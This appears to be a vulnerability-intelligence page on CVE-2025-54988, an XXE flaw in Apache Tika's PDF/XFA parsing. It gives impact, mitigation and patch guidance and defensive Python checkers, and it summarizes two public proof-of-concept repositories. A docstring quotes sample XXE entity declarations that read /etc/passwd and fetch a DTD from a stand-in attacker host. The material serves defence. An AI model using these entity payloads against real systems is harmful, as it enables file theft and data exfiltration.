Mallory
Critical · Public exploit

XXE in Apache Tika tika-parser-pdf-module via crafted XFA in PDF

Identifiers: CVE-2025-54988 · CWE-611 · Improper Restriction of XML…

CVE-2025-54988 is an XML External Entity (XXE) injection vulnerability in Apache Tika’s PDF parsing path, originally attributed to tika-parser-pdf-module. Apache Tika versions 1.13 through 3.2.1 are affected. The flaw is triggered when Tika processes a crafted PDF containing malicious XML Forms Architecture (XFA) content: the embedded XML is parsed unsafely, so external entities declared by the attacker can be resolved during parsing. The issue affects all platforms and extends to products and packages that depend on the vulnerable PDF parsing module, including tika-parsers-standard-modules, tika-parsers-standard-package, tika-app, tika-grpc, and tika-server-standard.

Later Apache guidance states that the underlying vulnerable logic and its fix were in tika-core, and CVE-2025-66516 expands the scope accordingly. CVE-2025-54988 refers specifically to the XXE reachable through the PDF/XFA parsing path.
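The affected range above (1.13 through 3.2.1) can be checked mechanically when triaging an inventory. The following is a minimal sketch, not an official tool: the function names are hypothetical, and it assumes plain dotted version strings, ignoring qualifiers such as `-SNAPSHOT`.

```python
import re

# Range taken from the description above: 1.13 through 3.2.1 are affected.
AFFECTED_MIN = (1, 13, 0)
FIRST_FIXED = (3, 2, 2)


def parse_version(text):
    """Turn '3.2.1' or '1.13' into a three-part tuple of ints.

    Qualifiers after the numeric part (for example '-SNAPSHOT') are ignored,
    which is a simplifying assumption of this sketch.
    """
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text.strip())
    if not match:
        raise ValueError(f"unrecognized version: {text!r}")
    return tuple(int(part) if part else 0 for part in match.groups())


def is_affected(version):
    """Return True if the version falls inside the affected range."""
    return AFFECTED_MIN <= parse_version(version) < FIRST_FIXED


if __name__ == "__main__":
    for candidate in ("1.12", "1.13", "2.9.0", "3.2.1", "3.2.2"):
        print(candidate, is_affected(candidate))
```

A version check only tells you which Tika release is declared; whether the PDF/XFA path is reachable still depends on how the application exposes parsing.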

ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

An attacker can use the XXE condition to read sensitive local data accessible to the Tika process and to induce the vulnerable system to make outbound requests to internal services or third-party hosts, i.e., SSRF-style behavior. Impact therefore includes confidentiality loss through file disclosure and indirect network interaction with internal resources. In downstream products that expose Tika parsing to authenticated or unauthenticated upload/ingest workflows, this can also create a pivot for internal reconnaissance or data exfiltration.

Mitigation

If you can’t patch tonight, do this now.

Until patching is complete, prevent untrusted PDF ingestion through Apache Tika, especially PDFs containing XFA forms. Isolate Tika parsing in a sandbox/container with minimal filesystem permissions and no unnecessary network reachability. Apply strict egress filtering from parsing hosts to reduce SSRF impact. Where feasible, disable or remove PDF attachment parsing paths that rely on the vulnerable module, and monitor parsing workflows for anomalous outbound requests or suspicious PDF submissions.
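One way to approximate the "prevent untrusted PDFs containing XFA forms" step is a pre-screen that runs before a file reaches Tika. The sketch below is a heuristic under stated assumptions: it scans raw bytes for the `/XFA` key and for DTD markers, so it will miss content hidden in compressed object streams or written with hex-escaped PDF names. A clean result is not proof that a file is safe, and the function names are hypothetical.

```python
import re

# Raw-byte markers. These are heuristics, not a PDF parser.
XFA_KEY = re.compile(rb"/XFA\b")
DTD_MARKERS = re.compile(rb"<!(?:DOCTYPE|ENTITY)\b")


def screen_pdf(data):
    """Report which suspicious markers appear in the raw bytes of an upload."""
    return {
        # The PDF header is expected near the start of the file.
        "is_pdf": data[:1024].find(b"%PDF-") != -1,
        "has_xfa_key": bool(XFA_KEY.search(data)),
        "has_dtd_markers": bool(DTD_MARKERS.search(data)),
    }


def should_quarantine(data):
    """Hold back PDFs that reference XFA or carry visible DTD declarations."""
    report = screen_pdf(data)
    return report["is_pdf"] and (report["has_xfa_key"] or report["has_dtd_markers"])


if __name__ == "__main__":
    sample = b"%PDF-1.7\n1 0 obj << /AcroForm << /XFA 2 0 R >> >> endobj"
    print(should_quarantine(sample))
```

Because the screen can be evaded, it is best treated as one layer alongside the sandboxing and egress filtering described above, not as a replacement for them.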

Remediation

Patch, then assume compromise.

Upgrade Apache Tika to version 3.2.2 or later, per the advisory. Because the vulnerable PDF parser module is consumed transitively by multiple Tika packages, confirm that deployed applications actually resolve the fixed dependency set; updating only a top-level package declaration may not be enough. Since later Apache guidance tied the underlying fix to tika-core, verify that both the parser-related components and the corresponding fixed tika-core version are deployed where applicable.
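To check what an application actually resolves, one option is to scan the text output of a dependency listing for Tika artifacts still below 3.2.2. The sketch below assumes Maven-style coordinates as printed by `mvn dependency:tree`, in the form `group:artifact:type[:classifier]:version:scope`. The function names are hypothetical and other build tools will need a different parser.

```python
import re

AFFECTED_MIN = (1, 13, 0)   # lower bound of the affected range
FIRST_FIXED = (3, 2, 2)     # first fixed release per the remediation text


def _version_tuple(text):
    """Parse the leading numeric part of a version; return None if absent."""
    match = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not match:
        return None
    return tuple(int(part) if part else 0 for part in match.groups())


def find_unfixed_tika(tree_text):
    """Return (artifact, version) pairs for Tika artifacts in the affected range."""
    findings = []
    for line in tree_text.splitlines():
        match = re.search(r"org\.apache\.tika:\S+", line)
        if not match:
            continue
        parts = match.group(0).split(":")
        if len(parts) < 5:
            continue  # not a full group:artifact:type:version:scope coordinate
        # Version is the second-to-last field, with or without a classifier.
        artifact, version = parts[1], parts[-2]
        parsed = _version_tuple(version)
        if parsed is not None and AFFECTED_MIN <= parsed < FIRST_FIXED:
            findings.append((artifact, version))
    return findings


if __name__ == "__main__":
    import sys
    for artifact, version in find_unfixed_tika(sys.stdin.read()):
        print(f"{artifact} {version} is in the affected range")
```

A result such as tika-core at 3.2.1 alongside parser modules at 3.2.2 is the kind of mismatch this check is meant to surface.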
PUBLIC EXPLOITS

Exploits

2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos.

cve-2025-54988-VulnTikaProject · Maturity: PoC · Verified exploit

This repository is a proof-of-concept (PoC) project for demonstrating an XXE (XML External Entity) vulnerability in Apache Tika version 3.2.1 (CVE-2025-54988). The project is a Java Spring Boot application that exposes HTTP endpoints for file upload and processing. The main endpoint of interest is /api/extract-text, which uses Apache Tika to extract text from uploaded files. If a specially crafted malicious PDF is uploaded to this endpoint, it will trigger the XXE vulnerability in Tika, potentially allowing attackers to read arbitrary files or perform other XXE-based attacks. The repository includes Docker support for easy deployment, as well as scripts for building and running the application. The codebase is small, with the main logic contained in TikaController.java. The /api/detect-type endpoint is also exposed but does not trigger the vulnerability. The repository is intended for security testing and demonstration purposes.

galoryber · Disclosed Dec 17, 2025 · java, bash, network

POC-CVE-2025-54988 · Maturity: PoC · Verified exploit

This repository provides a proof-of-concept (POC) exploit for CVE-2025-54988, targeting XML External Entity (XXE) vulnerabilities in PDF parsers that support XFA forms. The main script, 'xfa_xxe_poc_gen.py', is a Python tool that generates malicious PDF files containing XFA forms with embedded XXE payloads. It supports two modes: 'file' mode for local file read (e.g., extracting /etc/passwd from the target system), and 'oob' (out-of-band) mode, which leverages an attacker-hosted DTD to exfiltrate file contents to a remote server via HTTP/HTTPS. The script can also generate the necessary DTD file for OOB attacks. The README provides usage instructions and example commands. The repository is structured simply, with one Python exploit script and a README. The exploit is a POC and does not include a customizable payload delivery mechanism beyond the generated PDF and DTD files.
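For defenders, the two modes described above differ mainly in where the external entity points: a local path for file read, or a remote URL for out-of-band retrieval. The sketch below shows one way to triage XML text already extracted from a suspicious sample by listing its external entity declarations and classifying the target. It is a regex heuristic, not a DTD parser, and the function name and category labels are hypothetical.

```python
import re
from urllib.parse import urlparse

# Matches external entity declarations such as:
#   <!ENTITY xxe SYSTEM "file:///etc/passwd">
#   <!ENTITY % dtd SYSTEM "http://attacker.example/evil.dtd">
ENTITY_DECL = re.compile(
    r"<!ENTITY\s+(%\s+)?([\w.-]+)\s+"
    r"(?:SYSTEM|PUBLIC\s+(?:\"[^\"]*\"|'[^']*'))\s+"
    r"[\"']([^\"']*)[\"']"
)

NETWORK_SCHEMES = {"http", "https", "ftp"}


def triage_entities(xml_text):
    """List external entity declarations and classify each system identifier."""
    results = []
    for is_parameter, name, system_id in ENTITY_DECL.findall(xml_text):
        scheme = urlparse(system_id).scheme.lower()
        if scheme in NETWORK_SCHEMES:
            kind = "network"        # consistent with out-of-band retrieval
        elif scheme in ("", "file"):
            kind = "local-file"     # consistent with local file read
        else:
            kind = "other"
        results.append({
            "name": name,
            "parameter_entity": bool(is_parameter),
            "system_id": system_id,
            "kind": kind,
        })
    return results


if __name__ == "__main__":
    sample = '<!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    print(triage_entities(sample))
```

Any external entity declaration inside form data from an untrusted PDF is worth investigating regardless of how it is classified.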

mgthuramoemyint · Disclosed Sep 4, 2025 · python, file, network

EXPOSURE SURFACE

Affected products & vendors

Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.

Vendor | Product | Type
Apache Software Foundation | Tika | application

Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.
